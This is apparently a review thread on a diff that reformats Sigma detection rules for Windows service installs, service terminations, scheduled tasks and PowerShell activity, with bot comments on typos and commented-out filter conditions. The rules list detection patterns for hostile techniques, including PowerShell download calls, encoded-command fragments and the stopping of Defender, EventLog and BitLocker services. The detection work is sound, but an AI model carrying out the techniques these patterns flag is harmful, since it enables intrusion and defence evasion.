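Review bot: The reflowed `description` in the first hunk still ends mid-sentence — "These software are often abused by threat actors to perform" has no object — so the single-line rewrite carries over a truncated description. Either finish the clause, for example `description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform remote access or lateral movement.` (the intended ending should be confirmed with the rule author), or drop the dangling "to perform". The second hunk only annotates the `ServiceName|contains` entries with vendor links and needs no change.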
diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml index ed2182729..48155d811 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml @@ -12,16 +12,24 @@ logsource: product: windows service: system detection: + # Example: + # + # Remote Utilities - Host + # "C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe" -service + # user mode service + # auto start + # LocalSystem + # system: Channel: System selection_root: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains|all: - - \rutserv.exe - - -service - - ServiceName: Remote Utilities - Host + - ImagePath|contains|all: + - \rutserv.exe + - -service + - ServiceName: Remote Utilities - Host condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_sliver.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_sliver.yml index 2e3af507f..59f03cf11 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_sliver.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_sliver.yml 
@@ -1,8 +1,7 @@ title: Sliver C2 Default Service Installation id: 31c51af6-e7aa-4da7-84d4-8f32cc580af2 status: test -description: Detects known malicious service installation that appear in cases in - which a Sliver implants execute the PsExec commands +description: Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands references: - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml index 8f050e89f..be3714f05 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml @@ -1,11 +1,10 @@ title: Service Installed By Unusual Client - System id: 71c276aa-49cd-43d2-b920-2dcd3e6962d5 related: - - id: c4e92a97-a9ff-4392-9d2d-7a4c642768ca - type: similar + - id: c4e92a97-a9ff-4392-9d2d-7a4c642768ca + type: similar status: test -description: Detects a service installed by a client which has PID 0 or whose parent - has PID 0 +description: Detects a service installed by a client which has PID 0 or whose parent has PID 0 references: - https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html author: Tim Rauch (Nextron Systems), Elastic diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_susp.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_susp.yml index b458d9437..a43404c9b 100644 
--- a/sigma/builtin/system/service_control_manager/win_system_service_install_susp.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_susp.yml @@ -1,10 +1,10 @@ title: Suspicious Service Installation id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b related: - - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 - type: obsoletes - - id: 26481afe-db26-4228-b264-25a29fe6efc7 - type: similar + - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 + type: obsoletes + - id: 26481afe-db26-4228-b264-25a29fe6efc7 + type: similar status: test description: Detects suspicious service installation commands author: pH-T (Nextron Systems), Florian Roth (Nextron Systems) @@ -29,8 +29,8 @@ detection: - ' -sta ' - ' -w hidden ' - :\Temp\ - - .downloadfile( - - .downloadstring( + - .downloadfile( # PowerShell download command + - .downloadstring( # PowerShell download command - \ADMIN$\ - \Perflogs\ - '&&' diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml index 6d5a36a8f..cf1379d08 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml @@ -22,8 +22,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ServiceName: PSEXESVC - - ImagePath|endswith: \PSEXESVC.exe + - ServiceName: PSEXESVC + - ImagePath|endswith: \PSEXESVC.exe condition: system and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml index 1349f0122..fe8c25dc4 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml 
+++ b/sigma/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml @@ -1,8 +1,7 @@ title: TacticalRMM Service Installation id: 4bb79b62-ef12-4861-981d-2aab43fab642 status: test -description: Detects a TacticalRMM service installation. Tactical RMM is a remote - monitoring & management tool. +description: Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool. references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,8 +19,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains: tacticalrmm.exe - - ServiceName|contains: TacticalRMM Agent Service + - ImagePath|contains: tacticalrmm.exe + - ServiceName|contains: TacticalRMM Agent Service condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml index b3f075a3c..2b5e359a8 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml @@ -1,8 +1,7 @@ title: Tap Driver Installation id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 status: test -description: Well-known TAP software installation. Possible preparation for data exfiltration - using tunnelling techniques +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 modified: 2022/12/25 
diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_uncommon.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_uncommon.yml index 193291319..5a8c03cca 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_uncommon.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_uncommon.yml @@ -1,10 +1,10 @@ title: Uncommon Service Installation id: 26481afe-db26-4228-b264-25a29fe6efc7 related: - - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 - type: obsoletes - - id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b - type: derived + - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 + type: obsoletes + - id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b + type: derived status: test description: Detects uncommon service installation commands author: Florian Roth (Nextron Systems) @@ -33,19 +33,18 @@ detection: ImagePath|contains: ' -e' suspicious_encoded_keywords: ImagePath|contains: - - ' aQBlAHgA' - - ' aWV4I' - - ' IAB' - - ' JAB' - - ' PAA' - - ' SQBFAFgA' - - ' SUVYI' + - ' aQBlAHgA' # PowerShell encoded commands + - ' aWV4I' # PowerShell encoded commands + - ' IAB' # PowerShell encoded commands + - ' JAB' # PowerShell encoded commands + - ' PAA' # PowerShell encoded commands + - ' SQBFAFgA' # PowerShell encoded commands + - ' SUVYI' # PowerShell encoded commands filter_optional_thor_remote: ImagePath|startswith: :\WINDOWS\TEMP\thor10-remote\thor64.exe filter_main_defender_def_updates: ImagePath|contains: :\ProgramData\Microsoft\Windows Defender\Definition Updates\ - condition: system and (selection and ( suspicious_paths or all of suspicious_encoded_* - ) and not 1 of filter_main_* and not 1 of filter_optional_*) + condition: system and (selection and ( suspicious_paths or all of suspicious_encoded_* ) and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium 
diff --git a/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml b/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml index adb385122..741f81281 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml @@ -1,8 +1,8 @@ title: Windows Service Terminated With Error id: acfa2210-0d71-4eeb-b477-afab494d596c related: - - id: d6b5520d-3934-48b4-928c-2aa3f92d6963 - type: similar + - id: d6b5520d-3934-48b4-928c-2aa3f92d6963 + type: similar status: experimental description: Detects Windows services that got terminated for whatever reason references: @@ -19,10 +19,9 @@ detection: Channel: System selection: Provider_Name: Service Control Manager - EventID: 7023 + EventID: 7023 # The X Service service terminated with the following error condition: system and selection falsepositives: - - False positives could occur since service termination could happen due to multiple - reasons + - False positives could occur since service termination could happen due to multiple reasons level: low ruletype: Sigma diff --git a/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml b/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml index 4738bf25b..6f600824f 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml 
@@ -1,11 +1,10 @@ title: Important Windows Service Terminated With Error id: d6b5520d-3934-48b4-928c-2aa3f92d6963 related: - - id: acfa2210-0d71-4eeb-b477-afab494d596c - type: similar + - id: acfa2210-0d71-4eeb-b477-afab494d596c + type: similar status: experimental -description: Detects important or interesting Windows services that got terminated - for whatever reason +description: Detects important or interesting Windows services that got terminated for whatever reason references: - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -20,27 +19,28 @@ detection: Channel: System selection_eid: Provider_Name: Service Control Manager - EventID: 7023 + EventID: 7023 # The X Service service terminated with the following error selection_name: - - param1|contains: - - ' Antivirus' - - ' Firewall' - - Application Guard - - BitLocker Drive Encryption Service - - Encrypting File System - - Microsoft Defender - - Threat Protection - - Windows Event Log - - Binary|contains: - - 770069006e0064006500660065006e006400 - - 4500760065006e0074004c006f006700 - - 6d0070007300730076006300 - - 530065006e0073006500 - - '450046005300' - - '420044004500530056004300' + - param1|contains: + # Note that these names are "Display Names" and are language specific. If you're using a non-english system these can and will be different + - ' Antivirus' + - ' Firewall' + - Application Guard + - BitLocker Drive Encryption Service + - Encrypting File System + - Microsoft Defender + - Threat Protection + - Windows Event Log + # Use this If you collect the binary value provided from this event, which is the wide hex encoded value of the service name. + - Binary|contains: + - 770069006e0064006500660065006e006400 # windefend (Microsoft Defender Antivirus Service) + - 4500760065006e0074004c006f006700 # EventLog + - 6d0070007300730076006300 # mpssvc (Windows Defender Firewall) + - '530065006e0073006500' # Sense (Windows Defender Advanced Threat Protection Service) + - '450046005300' # EFS (Encrypting File System) + - '420044004500530056004300' # BDESVC (BitLocker Drive Encryption Service) condition: system and (all of selection_*) falsepositives: - - Rare false positives could occur since service termination could happen due - to multiple reasons + - Rare false positives could occur since service termination could happen due to multiple reasons level: high ruletype: Sigma 
diff --git a/sigma/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml b/sigma/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml index 3eed3a669..1c3287cee 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml @@ -1,8 +1,7 @@ title: Important Windows Service Terminated Unexpectedly id: 56abae0c-6212-4b97-adc0-0b559bb950c3 status: experimental -description: Detects important or interesting Windows services that got terminated - unexpectedly. +description: Detects important or interesting Windows services that got terminated unexpectedly. references: - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/ author: Nasreddine Bencherchali (Nextron Systems) @@ -17,15 +16,16 @@ detection: Channel: System selection_eid: Provider_Name: Service Control Manager - EventID: 7034 + EventID: 7034 # The X service terminated unexpectedly. It has done this Y time(s). selection_name: - - param1|contains: Message Queuing - - Binary|contains: - - 4d0053004d005100 - - 6d0073006d007100 + # Note that these names contained in "param1" are "Display Names" and are language specific. If you're using a non-english system these can and will be different + - param1|contains: Message Queuing + # Use this If you collect the binary value provided from this event, which is the wide hex encoded value of the service name. + - Binary|contains: + - 4d0053004d005100 # MSMQ (Microsoft Message Queuing). Encoded in upper case just in case + - 6d0073006d007100 # msmq condition: system and (all of selection_*) falsepositives: - - Rare false positives could occur since service termination could happen due - to multiple reasons + - Rare false positives could occur since service termination could happen due to multiple reasons level: high ruletype: Sigma 
diff --git a/sigma/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml b/sigma/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml index 771bd85ee..3acf6213f 100644 --- a/sigma/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml +++ b/sigma/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml @@ -1,8 +1,7 @@ title: RTCore Suspicious Service Installation id: 91c49341-e2ef-40c0-ac45-49ec5c3fe26c status: test -description: Detects the installation of RTCore service. Which could be an indication - of Micro-Star MSI Afterburner vulnerable driver abuse +description: Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse references: - https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml b/sigma/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml index f50da7c65..b9b253e46 100644 --- a/sigma/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml +++ b/sigma/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml @@ -20,8 +20,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 suspicious1: - - ImagePath|re: ^[Cc]:\\[Pp]rogram[Dd]ata\\.{1,9}\.exe - - ImagePath|re: ^[Cc]:\\.{1,9}\.exe + - ImagePath|re: ^[Cc]:\\[Pp]rogram[Dd]ata\\.{1,9}\.exe + - ImagePath|re: ^[Cc]:\\.{1,9}\.exe condition: system and (selection and 1 of suspicious*) falsepositives: - Unknown 
diff --git a/sigma/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml b/sigma/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml index 716231f2b..41b09cf33 100644 --- a/sigma/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml +++ b/sigma/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml @@ -26,5 +26,6 @@ detection: condition: system and selection falsepositives: - Bad connections or network interruptions +# too many false positives level: medium ruletype: Sigma diff --git a/sigma/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml b/sigma/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml index 9a6f37493..7ac495f42 100644 --- a/sigma/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml +++ b/sigma/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml @@ -1,9 +1,7 @@ title: Scheduled Task Executed From A Suspicious Location id: 424273ea-7cf8-43a6-b712-375f925e481f status: test -description: Detects the execution of Scheduled Tasks where the Program being run - is located in a suspicious location or it's an unusale program to be run from - a Scheduled Task +description: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) 
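Review bot: The added `# too many false positives` line in win_system_rdp_potential_cve_2019_0708.yml sits as a bare top-level comment between the `falsepositives` list and `level`, so a reader cannot tell whether it qualifies the listed false positive, explains why the level is only medium, or is a leftover TODO. Attaching it to the line it refers to, e.g. `level: medium # too many false positives`, or turning it into a proper `falsepositives` entry would make the intent unambiguous.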
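Review bot: The single-line `description` of win_taskscheduler_execution_from_susp_locations.yml keeps the typo `unusale`; the new line should read `… or it's an unusual program to be run from a Scheduled Task`. The sibling rule win_taskscheduler_lolbin_execution_via_task_scheduler.yml, next in this diff, already spells it `unusual` in an otherwise near-identical sentence, so fixing it here also keeps the two descriptions aligned.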
@@ -15,14 +13,12 @@ tags: logsource: product: windows service: taskscheduler - definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is - disabled by default and needs to be enabled in order for this detection to - trigger' + definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger' detection: taskscheduler: Channel: Microsoft-Windows-TaskScheduler/Operational selection: - EventID: 129 + EventID: 129 # Created Task Process Path|contains: - C:\Windows\Temp\ - \AppData\Local\Temp\ @@ -30,6 +26,10 @@ detection: - \Downloads\ - \Users\Public\ - C:\Temp\ + # If you experience FP. Uncomment the filter below and add the specific TaskName with the Program to it + # filter: + # TaskName: '\Exact\Task\Name' + # Path: 'Exact\Path' condition: taskscheduler and selection falsepositives: - Unknown diff --git a/sigma/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml b/sigma/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml index 45501e8b3..e4f8f4fe5 100644 --- a/sigma/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml +++ b/sigma/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml @@ -1,9 +1,7 @@ title: Scheduled Task Executed Uncommon LOLBIN id: f0767f15-0fb3-44b9-851e-e8d9a6d0005d status: test -description: Detects the execution of Scheduled Tasks where the program being run - is located in a suspicious location or where it is an unusual program to be run - from a Scheduled Task +description: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) 
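Review bot: The commented-out filter template added after `- C:\Temp\` tells users to uncomment `filter:` to suppress false positives, but the live `condition: taskscheduler and selection` never references a filter, so uncommenting the block alone has no effect. The comment should also show the condition to switch to, e.g. `# condition: taskscheduler and selection and not filter`, the way the lolbin rule later in this diff includes its `# condition:` line. Naming the `Path` placeholder more explicitly than `'Exact\Path'` (e.g. the full path of the task's program) would also reduce the chance of it being copied literally.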
@@ -15,14 +13,12 @@ tags: logsource: product: windows service: taskscheduler - definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is - disabled by default and needs to be enabled in order for this detection to - trigger' + definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger' detection: taskscheduler: Channel: Microsoft-Windows-TaskScheduler/Operational selection: - EventID: 129 + EventID: 129 # Created Task Process Path|endswith: - \calc.exe - \cscript.exe @@ -30,11 +26,14 @@ detection: - \mspaint.exe - \notepad.exe - \regsvr32.exe + # - '\rundll32.exe' - \wscript.exe + # filter_system: + # Path|endswith: '\rundll32.exe' + # TaskName|startswith: '\Microsoft\Windows\' + # condition: selection and not 1 of filter_* condition: taskscheduler and selection falsepositives: - - False positives may occur with some of the selected binaries if you have tasks - using them (which could be very common in your environment). Exclude all the - specific trusted tasks before using this rule + - False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule level: medium ruletype: Sigma diff --git a/sigma/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml b/sigma/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml index bbbf7b10f..900110595 100644 --- a/sigma/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml +++ b/sigma/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml 
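Review bot: The commented-out `# condition: selection and not 1 of filter_*` omits the `taskscheduler` selector that the live `condition: taskscheduler and selection` relies on, so a user who enables `filter_system` and this condition as written would silently drop the `Channel: Microsoft-Windows-TaskScheduler/Operational` check from the first hunk. It should read `# condition: taskscheduler and selection and not 1 of filter_*`. The commented `# - '\rundll32.exe'` entry would also benefit from a short note saying it stays disabled until the `filter_system` exclusion for `\Microsoft\Windows\` tasks is enabled, which is presumably the intent.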
@@ -1,14 +1,12 @@ title: Important Scheduled Task Deleted id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d related: - - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 - type: similar - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 # ProcCreation schtasks delete + type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries try to stop system services or processes by - deleting their respective scheduled tasks in order to conduct data destructive - activities +description: Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities author: frack113 date: 2023/01/13 modified: 2023/02/07 @@ -18,9 +16,7 @@ tags: logsource: product: windows service: taskscheduler - definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is - disabled by default and needs to be enabled in order for this detection to - trigger' + definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger' detection: taskscheduler: Channel: Microsoft-Windows-TaskScheduler/Operational diff --git a/sigma/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml b/sigma/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml index d0af9b7b8..70deffb5f 100644 --- a/sigma/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml +++ b/sigma/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml 
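Review bot: The new inline comment on the second `related` entry misspells the log name: `# Security-Audting Eventlog` should be `# Security-Auditing Eventlog`. The comment on the first entry, `# ProcCreation schtasks delete`, is fine and the two together make the `similar` links much easier to follow.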
@@ -1,8 +1,7 @@ title: Ngrok Usage with Remote Desktop Service id: 64d51a51-32a6-49f0-9f3d-17e34d640272 status: test -description: Detects cases in which ngrok, a reverse proxy tool, forwards events to - the local RDP port, which could be a sign of malicious behaviour +description: Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour references: - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg - https://ngrok.com/ diff --git a/sigma/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml b/sigma/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml index a8c6f0638..af3be30f2 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml @@ -1,11 +1,10 @@ title: Uncommon PowerShell Hosts id: d7326048-328b-4d5e-98af-86e84b17c765 related: - - id: 64e8e417-c19a-475a-8d19-98ea705394cc - type: derived + - id: 64e8e417-c19a-475a-8d19-98ea705394cc + type: derived status: test -description: Detects alternate PowerShell hosts potentially bypassing detections looking - for powershell.exe +description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe references: - https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html author: Roberto Rodriguez @Cyb3rWard0g 
@@ -24,10 +23,11 @@ detection:
 Channel: Windows PowerShell
 selection:
 Data|contains: HostApplication=
+ # Note: Powershell Logging Data is localized. Meaning that "HostApplication" field will be translated to a different field on a non english layout. This rule doesn't take this into account due to the sheer ammount of possibilities. It's up to the user to add these cases.
 filter_main_ps:
 Data|contains:
- - HostApplication=?:/Windows/System32/WindowsPowerShell/v1.0/powershell
- - HostApplication=?:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell
+ - HostApplication=?:/Windows/System32/WindowsPowerShell/v1.0/powershell # In some cases powershell was invoked with inverted slashes
+ - HostApplication=?:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell # In some cases powershell was invoked with inverted slashes
 - HostApplication=?:\Windows\System32\sdiagnhost.exe
 - HostApplication=?:\Windows\System32\WindowsPowerShell\v1.0\powershell
 - HostApplication=?:\Windows\SysWOW64\sdiagnhost.exe
@@ -35,8 +35,7 @@ detection:
 - HostApplication=powershell
 filter_optional_citrix:
 Data|contains: Citrix\ConfigSync\ConfigSync.ps1
- condition: ps_classic_start and (selection and not 1 of filter_main_* and not
- 1 of filter_optional_*)
+ condition: ps_classic_start and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
 falsepositives:
 - Programs using PowerShell directly without invocation of a dedicated interpreter
 - MSP Detection Searcher
diff --git a/sigma/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml b/sigma/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml
index d067e7aa9..ccf8a13e1 100644
--- a/sigma/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml
+++ b/sigma/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml
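Review bot: The localization note added under `selection:` is a useful caveat, since the `Data|contains: HostApplication=` selector silently matches nothing on systems where that field name is translated, but it carries typos ("ammount", "non english layout") and is hard to read as one sentence. Suggest `# Note: PowerShell logging data is localized, so the "HostApplication" field name can differ on non-English systems. This rule does not account for that because of the sheer amount of variants; add the cases relevant to your environment.` The two "inverted slashes" comments on the filter entries are clear as written, though they could name the forward-slash form explicitly to match the exclusion they annotate. The enclosing `detection:` block starts outside the hunk.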
@@ -1,8 +1,7 @@
 title: Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet
 id: ea207a23-b441-4a17-9f76-ad5be47d51d3
 status: experimental
-description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule"
- to enumerate the local firewall rules on a host.
+description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.
 references:
 - https://learn.microsoft.com/en-us/powershell/module/netsecurity/get-netfirewallrule?view=windowsserver2022-ps
 - https://learn.microsoft.com/en-us/powershell/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps
diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml
index 5233fd5da..f449ca832 100644
--- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml
+++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml
@@ -1,14 +1,9 @@
 title: Compress-Archive Cmdlet Execution
 id: 6dc5d284-69ea-42cf-9311-fb1c3932a69a
 status: test
-description: 'Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet
- in order to compress folders and files.
-
- An adversary might compress data (e.g., sensitive documents) that is collected
- prior to exfiltration in order to make it portable and minimize the amount of
- data sent over the network.
-
- '
+description: |
+ Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files.
+ An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md
 author: Timur Zinniatullin, oscd.community
diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml
index 9442f6e80..bfa6df08e 100644
--- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml
+++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml
@@ -1,10 +1,7 @@
 title: Windows Mail App Mailbox Access Via PowerShell Script
 id: 4e485d01-e18a-43f6-a46b-ef20496fa9d3
 status: experimental
-description: Detects PowerShell scripts that try to access the default Windows MailApp
- MailBox. This indicates manipulation of or access to the stored emails of a user.
- E.g. this could be used by an attacker to exfiltrate or delete the content of
- the emails.
+description: Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1070.008/T1070.008.md
 author: frack113
diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml
index dbe699479..45ca8aacb 100644
--- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml
+++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml
@@ -1,11 +1,10 @@
 title: SMB over QUIC Via PowerShell Script
 id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae
 related:
- - id: 2238d337-42fb-4971-9a68-63570f2aede4
- type: similar
+ - id: 2238d337-42fb-4971-9a68-63570f2aede4
+ type: similar
 status: experimental
-description: Detects the mounting of Windows SMB shares over QUIC, which can be an
- unexpected event in some enterprise environments
+description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md
